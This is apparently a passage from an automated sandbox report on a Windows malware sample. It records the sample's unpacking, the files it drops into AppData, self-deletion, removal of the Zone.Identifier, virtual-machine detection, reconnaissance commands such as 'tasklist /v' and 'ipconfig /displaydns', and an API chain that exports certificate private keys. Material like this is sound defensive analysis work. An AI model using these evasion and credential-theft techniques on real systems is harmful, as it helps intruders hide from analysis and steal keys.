    Source: C:\Windows\explorer.exeSection loaded: ntmarta.dll
    Source: C:\Windows\explorer.exeSection loaded: cryptsp.dll
    Source: C:\Windows\explorer.exeSection loaded: wldp.dll
    Source: C:\Windows\explorer.exeSection loaded: iertutil.dll
    Source: C:\Windows\explorer.exeSection loaded: srvcli.dll
    Source: C:\Windows\explorer.exeSection loaded: netutils.dll
    Source: C:\Windows\explorer.exeSection loaded: umpdc.dll
    Source: C:\Windows\explorer.exeSection loaded: dnsapi.dll
    Source: C:\Windows\explorer.exeSection loaded: winhttp.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
    Source: C:\Windows\System32\ipconfig.exeSection loaded: iphlpapi.dll
    Source: C:\Windows\System32\ipconfig.exeSection loaded: dhcpcsvc.dll
    Source: C:\Windows\System32\ipconfig.exeSection loaded: dhcpcsvc6.dll
    Source: C:\Windows\System32\ipconfig.exeSection loaded: dnsapi.dll
    Source: C:\Windows\System32\ROUTE.EXESection loaded: iphlpapi.dll
    Source: C:\Windows\System32\ROUTE.EXESection loaded: dhcpcsvc6.dll
    Source: C:\Windows\System32\ROUTE.EXESection loaded: dhcpcsvc.dll
    Source: C:\Windows\System32\ROUTE.EXESection loaded: dnsapi.dll
    Source: C:\Windows\System32\netsh.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\System32\netsh.exeSection loaded: ifmon.dll
    Source: C:\Windows\System32\netsh.exeSection loaded: iphlpapi.dll
    Source: C:\Windows\System32\netsh.exeSection loaded: mprapi.dll
    Source: C:\Windows\System32\netsh.exeSection loaded: rasmontr.dll
    Source: C:\Windows\System32\netsh.exeSection loaded: rasapi32.dll
    Source: C:\Windows\System32\netsh.exeSection loaded: fwpuclnt.dll
    Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{603D3801-BD81-11d0-A3A5-00C04FD706EC}\InProcServer32Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /v /fo csv
    Source: C:\Windows\SysWOW64\explorer.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
    Source: C:\Users\user\Desktop\ctMI3TYXpX.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
    Source: ctMI3TYXpX.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

    Data Obfuscation

    barindex
    Detected unpacking (changes PE section rights)
    Source: C:\Users\user\Desktop\ctMI3TYXpX.exeUnpacked PE file: 0.2.ctMI3TYXpX.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.saxaxi:R;.losucu:R;.rasiye:W;.rsrc:R; vs .text:EW;
    Source: C:\Users\user\AppData\Roaming\jghruerUnpacked PE file: 5.2.jghruer.400000.0.unpack .text:ER;.rdata:R;.data:W;.saxaxi:R;.losucu:R;.rasiye:W;.rsrc:R; vs .text:EW;
    Source: C:\Users\user\AppData\Local\Temp\35DB.exeUnpacked PE file: 6.2.35DB.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.dilafav:R;.heciw:R;.hirezep:W;.rsrc:R; vs .text:EW;
    Source: C:\Users\user\AppData\Roaming\hdhruerUnpacked PE file: 8.2.hdhruer.400000.0.unpack .text:ER;.rdata:R;.data:W;.dilafav:R;.heciw:R;.hirezep:W;.rsrc:R; vs .text:EW;
    Source: C:\Users\user\AppData\Local\Temp\B972.exeCode function: 9_2_00007FF6F2D63220 CertGetCertificateContextProperty,CryptAcquireCertificatePrivateKey,CryptGetUserKey,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,CryptExportKey,VirtualProtect,VirtualProtect,CryptAcquireContextA,CryptImportKey,OpenSCManagerA,OpenServiceA,QueryServiceStatusEx,OpenProcess,ReadProcessMemory,ReadProcessMemory,WriteProcessMemory,NCryptExportKey,CertOpenStore,CertAddCertificateLinkToStore,CertSetCertificateContextProperty,PFXExportCertStoreEx,PFXExportCertStoreEx,9_2_00007FF6F2D63220
    Source: ctMI3TYXpX.exeStatic PE information: section name: .saxaxi
    Source: ctMI3TYXpX.exeStatic PE information: section name: .losucu
    Source: ctMI3TYXpX.exeStatic PE information: section name: .rasiye
    Source: 35DB.exe.1.drStatic PE information: section name: .dilafav
    Source: 35DB.exe.1.drStatic PE information: section name: .heciw
    Source: 35DB.exe.1.drStatic PE information: section name: .hirezep
    Source: hdhruer.1.drStatic PE information: section name: .dilafav
    Source: hdhruer.1.drStatic PE information: section name: .heciw
    Source: hdhruer.1.drStatic PE information: section name: .hirezep
    Source: jghruer.1.drStatic PE information: section name: .saxaxi
    Source: jghruer.1.drStatic PE information: section name: .losucu
    Source: jghruer.1.drStatic PE information: section name: .rasiye
    Source: C:\Users\user\Desktop\ctMI3TYXpX.exeCode function: 0_2_004014D9 pushad ; ret 0_2_004014E9
    Source: C:\Users\user\Desktop\ctMI3TYXpX.exeCode function: 0_2_004031DB push eax; ret 0_2_004032AB
    Source: C:\Users\user\Desktop\ctMI3TYXpX.exeCode function: 0_2_004B1540 pushad ; ret 0_2_004B1550
    Source: C:\Users\user\Desktop\ctMI3TYXpX.exeCode function: 0_2_00507372 push esp; ret 0_2_00507374
    Source: C:\Users\user\Desktop\ctMI3TYXpX.exeCode function: 0_2_00506212 pushfd ; iretd 0_2_00506213
    Source: C:\Users\user\Desktop\ctMI3TYXpX.exeCode function: 0_2_00505715 push B63524ADh; retn 001Fh0_2_0050574C
    Source: C:\Users\user\AppData\Roaming\jghruerCode function: 5_2_00531540 pushad ; ret 5_2_00531550
    Source: C:\Users\user\AppData\Roaming\jghruerCode function: 5_2_00595E32 pushfd ; iretd 5_2_00595E33
    Source: C:\Users\user\AppData\Roaming\jghruerCode function: 5_2_00595335 push B63524ADh; retn 001Fh5_2_0059536C
    Source: C:\Users\user\AppData\Roaming\jghruerCode function: 5_2_00596F92 push esp; ret 5_2_00596F94
    Source: C:\Users\user\AppData\Local\Temp\35DB.exeCode function: 6_2_00402842 pushad ; retf F6A4h6_2_004029D1
    Source: C:\Users\user\AppData\Local\Temp\35DB.exeCode function: 6_2_00401065 pushfd ; retf 6_2_0040106A
    Source: C:\Users\user\AppData\Local\Temp\35DB.exeCode function: 6_2_00402805 push 21CACAEFh; iretd 6_2_0040280A
    Source: C:\Users\user\AppData\Local\Temp\35DB.exeCode function: 6_2_00402511 push ebp; iretd 6_2_00402523
    Source: C:\Users\user\AppData\Local\Temp\35DB.exeCode function: 6_2_00403325 push eax; ret 6_2_004033F3
    Source: C:\Users\user\AppData\Local\Temp\35DB.exeCode function: 6_2_00403433 pushad ; ret 6_2_004035AB
    Source: C:\Users\user\AppData\Local\Temp\35DB.exeCode function: 6_2_00401182 push esp; retf 6_2_0040118E
    Source: C:\Users\user\AppData\Local\Temp\35DB.exeCode function: 6_2_00402A9D pushad ; retf 6_2_00402AAB
    Source: C:\Users\user\AppData\Local\Temp\35DB.exeCode function: 6_2_004012B7 push cs; iretd 6_2_004012B8
    Source: C:\Users\user\AppData\Local\Temp\35DB.exeCode function: 6_2_005B2578 push ebp; iretd 6_2_005B258A
    Source: C:\Users\user\AppData\Local\Temp\35DB.exeCode function: 6_2_005B286C push 21CACAEFh; iretd 6_2_005B2871
    Source: C:\Users\user\AppData\Local\Temp\35DB.exeCode function: 6_2_005B131E push cs; iretd 6_2_005B131F
    Source: C:\Users\user\AppData\Local\Temp\35DB.exeCode function: 6_2_005B2B04 pushad ; retf 6_2_005B2B12
    Source: C:\Users\user\AppData\Local\Temp\35DB.exeCode function: 6_2_005B10CC pushfd ; retf 6_2_005B10D1
    Source: C:\Users\user\AppData\Local\Temp\35DB.exeCode function: 6_2_005B11E9 push esp; retf 6_2_005B11F5
    Source: C:\Users\user\AppData\Roaming\hdhruerCode function: 8_2_00402842 pushad ; retf F6A4h8_2_004029D1
    Source: C:\Users\user\AppData\Roaming\hdhruerCode function: 8_2_00401065 pushfd ; retf 8_2_0040106A
    Source: C:\Users\user\AppData\Roaming\hdhruerCode function: 8_2_00402805 push 21CACAEFh; iretd 8_2_0040280A
    Source: C:\Users\user\AppData\Roaming\hdhruerCode function: 8_2_00402511 push ebp; iretd 8_2_00402523
    Source: C:\Users\user\AppData\Roaming\hdhruerCode function: 8_2_00403325 push eax; ret 8_2_004033F3
    Source: C:\Users\user\AppData\Roaming\hdhruerCode function: 8_2_00403433 pushad ; ret 8_2_004035AB

    Persistence and Installation Behavior

    barindex
    Uses ipconfig to lookup or modify the Windows network settings
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ipconfig.exe ipconfig /displaydns
    Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\B972.exeJump to dropped file
    Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\35DB.exeJump to dropped file
    Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\jghruerJump to dropped file
    Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\hdhruerJump to dropped file
    Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\hdhruerJump to dropped file
    Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\jghruerJump to dropped file

    Hooking and other Techniques for Hiding and Protection

    barindex
    Deletes itself after installation
    Source: C:\Windows\explorer.exeFile deleted: c:\users\user\desktop\ctmi3tyxpx.exeJump to behavior
    Hides that the sample has been downloaded from the Internet (zone.identifier)
    Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\jghruer:Zone.Identifier read attributes | deleteJump to behavior
    Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\hdhruer:Zone.Identifier read attributes | deleteJump to behavior
    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\B972.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\systeminfo.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX

    Malware Analysis System Evasion

    barindex
    Checks if the current machine is a virtual machine (disk enumeration)
    Source: C:\Users\user\Desktop\ctMI3TYXpX.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
    Source: C:\Users\user\Desktop\ctMI3TYXpX.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
    Source: C:\Users\user\Desktop\ctMI3TYXpX.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
    Source: C:\Users\user\Desktop\ctMI3TYXpX.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
    Source: C:\Users\user\Desktop\ctMI3TYXpX.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
    Source: C:\Users\user\Desktop\ctMI3TYXpX.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
    Source: C:\Users\user\AppData\Roaming\jghruerKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
    Source: C:\Users\user\AppData\Roaming\jghruerKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
    Source: C:\Users\user\AppData\Roaming\jghruerKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
    Source: C:\Users\user\AppData\Roaming\jghruerKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
    Source: C:\Users\user\AppData\Roaming\jghruerKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
    Source: C:\Users\user\AppData\Roaming\jghruerKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\35DB.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\35DB.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\35DB.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\35DB.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\35DB.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\35DB.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
    Source: C:\Users\user\AppData\Roaming\hdhruerKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
    Source: C:\Users\user\AppData\Roaming\hdhruerKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
    Source: C:\Users\user\AppData\Roaming\hdhruerKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
    Source: C:\Users\user\AppData\Roaming\hdhruerKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
    Source: C:\Users\user\AppData\Roaming\hdhruerKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
    Source: C:\Users\user\AppData\Roaming\hdhruerKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
    Found evasive API chain (may stop execution after checking mutex)
    Source: C:\Windows\SysWOW64\explorer.exeEvasive API call chain: CreateMutex,DecisionNodes,Sleepgraph_16-882
    Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
